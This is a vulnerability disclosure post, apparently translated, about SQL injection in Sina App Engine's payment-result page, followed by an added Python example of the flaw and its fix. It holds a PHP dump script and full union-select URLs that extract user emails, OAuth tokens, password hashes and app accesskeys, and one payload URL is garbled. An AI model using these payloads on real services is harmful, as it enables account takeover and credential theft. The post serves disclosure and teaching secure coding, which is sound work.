Sina SAE falls: OAuth token and security password leaks, and any app can be hacked

Source: Internet
Author: User
Tags: oauth

In the afternoon I was going to try the SMS function that costs a few yunbeans on SAE. Since I hadn't done any black-box testing for a long time, I just wanted to look at the payment flow, but I found another vulnerability instead. I could get all the information you can think of on SAE, endangering every user; a website was easily taken over (that site was built on SAE), and the idea of taking over any app on SAE was tested...

However, the officials can rest assured: I did not dump the database or view order information. Please fix the issue quickly :)
PS: I didn't expect this. I haven't studied the SAE sandbox environment yet; I found a weak spot on the main site, and it was terrible.

The problem is ultimately an SQL injection. Why would SAE have an injection? Why can't I get an injection on SAE after I've slapped myself?!
Generally, Sina's security team finds the obvious problems, and passing hackers inspect the site too. By intuition, the problems will be in some corner, in places nobody else pays attention to. Here:

http://sae.sina.com.cn/pay/result/xft?sae_internal=1&may_fail=0&order_id=1
I ran sqlmap against a payment-result feedback page. The silly thing told me only blind injection was possible... so I wrote a temporary script to dump the database.
 
 
<?php
// The author's dump script, as posted; the curlrequest() helper was omitted from the post.
$url = "http://sae.sina.com.cn/pay/result/xft?sae_internal=1&may_fail=0&order_id=1'";

for ($i = 0; $i < 1000; $i++) { // pretty nice ..
    // Each request pulls one column name of the 'user' table out of information_schema
    // via a union select; the 0x7c ('|') delimiters let explode() pick the field out.
    $res = explode("|", curlrequest($url . urlencode(" and 1=2 union select 1,concat(0x7c,COLUMN_NAME,0x7c),3,4,5 from information_schema.COLUMNS where TABLE_NAME='user' limit $i,1 #")));
    echo $res[10] . "\r\n";
}

(curlrequest() definition omitted)
 
Partial data:

Databases:
information_schema
app_store
cron
cron2
cron_result
mysql_stat
sae
sae_java
sae_nodejs
SwsUser
test
xweibo
 
admin table ->
id
sws_uid
name
password
email
timeline
role
s_mail
mobile
 
app table (stores app-related information, such as name and accesskey) ->
name
cn_name
api_version
biz_type
desp
default_version
cname
create_uid
accesskey
group_name
pool_name
svn_url
status
timeline
mysql_port
old_status
hash
cookie
platform
lang
app_type
middle_type
icon
status_flags
delete_time
 
user table (stores all user information, including uid, oauth token, email and the SAE secondary security password) ->
id
name
email
password_md5
mobile
tel
status
timeline
expires
sws_uid
old_status
level
deleted
money
platform
beans_level
mobile_verified
mobile_reverified
is_active
weibo_uid
weibo_name
email_verified
weibo_access_token
devlevel
vdun
olevel
level_endtime
level_policy
up_welcomed
appmid
is_qy_vendor
last_update
UserName
 
Without much guessing, user-related information can be queried directly over the web:
http://sae.sina.com.cn//pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,email,0x7c,weibo_name,0x7c,weibo_access_token,0x7c,password_md5,0x7c%29,3,4,5%20from%20sae.user%20where%20weibo_uid='000000'%20limit % 1627825392, 1% 23
 
The md5 password is SAE's secondary security password. This password has an even better use, which will be explained later.

You can also query the accesskey:
http://sae.sina.com.cn//pay/result/xft?sae_internal=1&may_fail=0&order_id=-1%27%20and%201=2%20union%20select%201,concat%280x7c,accesskey,0x7c,create_uid,0x7c%29,3,4,5%20from%20sae.app%20limit%200,1%23
 
As you can see, everything needed to control an app is there.

Oh, and there is a simpler method: the SAE svn password is SAE's secondary security password.
 
All right, let's try hacking any app on SAE.

Proof complete; screenshot pasted.
Solution:

In fact, it is just an injection, but what is hard to understand is how transparent the database is: permissions. Everything you could want is reachable from the database account behind the payment page. Is that worth reflecting on?
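Added example (not from the original post, and not SAE's code): the vulnerable pattern behind the result page beside its fixed form, modelled in Python with an in-memory SQLite database instead of PHP/MySQL. The tables, columns and rows are constructed stand-ins for the order table and the sae.user table listed above.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the page's database: a payment-order
# table behind the result page, plus a cut-down copy of the sae.user columns.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pay_order (id INTEGER, uid INTEGER, amount INTEGER, status TEXT)")
    conn.execute("CREATE TABLE user (id INTEGER, email TEXT, weibo_uid TEXT, "
                 "weibo_access_token TEXT, password_md5 TEXT)")
    conn.executemany("INSERT INTO pay_order VALUES (?, ?, ?, ?)",
                     [(1, 1, 500, "paid"), (2, 2, 300, "failed")])
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?)", [
        (1, "alice@example.com", "1001", "TOKEN-constructed-alice", "md5-constructed-1"),
        (2, "bob@example.com", "1002", "TOKEN-constructed-bob", "md5-constructed-2"),
    ])
    return conn

def vulnerable_result(conn, order_id):
    # The pattern the post exploits: the order_id query parameter is spliced
    # straight into the SQL string, so a quote ends the literal and the rest
    # of the input runs as SQL with the page's database privileges.
    sql = f"SELECT id, uid, amount, status FROM pay_order WHERE id = '{order_id}'"
    return conn.execute(sql).fetchall()

def hardened_result(conn, order_id):
    # Two independent guards: reject anything that is not a plain integer id,
    # then bind the value as a parameter so it can never be parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,18}", str(order_id)):
        raise ValueError("order_id must be a positive integer")
    sql = "SELECT id, uid, amount, status FROM pay_order WHERE id = ?"
    return conn.execute(sql, (int(order_id),)).fetchall()

# Constructed input of the same shape as the post's union-select payload
# (SQLite comment syntax instead of MySQL's '#'): four columns to match the
# legitimate SELECT, with the interesting fields concatenated into one column.
INJECTED_ORDER_ID = ("-1' UNION SELECT 1, email || '|' || weibo_access_token, 3, "
                     "password_md5 FROM user -- ")

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_result(db, INJECTED_ORDER_ID))  # leaks every user row
    try:
        hardened_result(db, INJECTED_ORDER_ID)
    except ValueError as exc:
        print("hardened:", exc)
```

The third control the post points at is least privilege: the database account used by a payment page has no business reading user, app or information_schema tables, so even a successful injection there would return nothing worth having.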
